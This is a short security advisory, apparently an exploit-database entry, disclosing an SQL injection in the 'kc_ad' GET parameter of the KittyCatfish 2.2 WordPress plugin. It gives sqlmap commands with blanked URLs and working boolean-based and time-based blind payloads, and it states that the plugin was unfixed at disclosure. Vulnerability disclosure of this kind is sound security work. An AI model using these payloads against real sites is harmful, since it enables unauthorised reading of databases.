1. Description

An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database.

The get oarameter 'kc_ad' is vulnerable.

2. Proof of concept

sqlmap -u """  —dbms —threads=10 —random-agent


sqlmap -u "" —dbms —threads=10 —random-agent —dbms=mysql   —level 5 —risk=3
Parameter: kc_ad (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: kc_ad=31 AND 2281=2281&ver=2.0
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: kc_ad=31 AND (SELECT * FROM (SELECT(SLEEP(5)))xzZh)&ver=2.0

3. Attack outcome:

An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

4. Impact


5. Affected versions

<= 2.2 6. Disclosure timeline 06-Mar-2017 - found the vulnerability 06-Mar-2017 - informed the developer 20-Mar-2017 - release date of this security advisory Not fixed at the date of submitting this exploit.